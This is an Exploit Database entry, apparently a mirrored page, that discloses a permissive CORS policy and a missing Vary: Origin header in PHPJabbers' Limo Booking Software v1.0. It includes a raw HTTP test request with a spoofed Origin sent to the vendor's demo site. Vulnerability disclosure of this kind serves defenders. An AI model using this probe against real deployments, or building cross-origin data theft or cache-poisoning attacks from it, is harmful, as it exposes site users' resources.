Limo Booking Software v1.0 – CORS

• Exploit Database
• 14 阅读

• 作者： nu11secur1ty
  日期： 2023-10-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51744/

• ## Title: Limo Booking Software v1.0 - CORS 
  ## Author: nu11secur1ty
  ## Date: 09/08/2023
  ## Vendor: https://www.phpjabbers.com/
  ## Software: https://www.phpjabbers.com/limo-booking-software/#sectionDemo
  ## Reference: https://portswigger.net/web-security/cors
  
  ## Description:
  The application implements an HTML5 cross-origin resource sharing
  (CORS) policy for this request that allows access from any domain.
  The application allowed access from the requested origin http://wioydcbiourl.com
  Since the Vary: Origin header was not present in the response, reverse
  proxies and intermediate servers may cache it. This may enable an
  attacker to carry out cache poisoning attacks. The attacker can get
  some of the software resources of the victim without the victim
  knowing this.
  
  STATUS: HIGH Vulnerability
  
  [+]Test Payload:
  ```
  GET /1694201352_198/index.php?controller=pjFrontPublic&action=pjActionFleets&locale=1&index=2795
  HTTP/1.1
  Host: demo.phpjabbers.com
  Accept-Encoding: gzip, deflate
  Accept: */*
  Accept-Language: en-US;q=0.9,en;q=0.8
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
  AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141
  Safari/537.36
  Connection: close
  Cache-Control: max-age=0
  Origin: http://wioydcbiourl.com
  Referer: http://demo.phpjabbers.com/
  Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
  Sec-CH-UA-Platform: Windows
  Sec-CH-UA-Mobile: ?0
  
  ```
  
  ## Reproduce:
  [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Limo-Booking-Software-1.0)
  
  ## Proof and Exploit:
  [href](https://www.nu11secur1ty.com/2023/09/limo-booking-software-10-cors.html)
  
  ## Time spent:
  00:35:00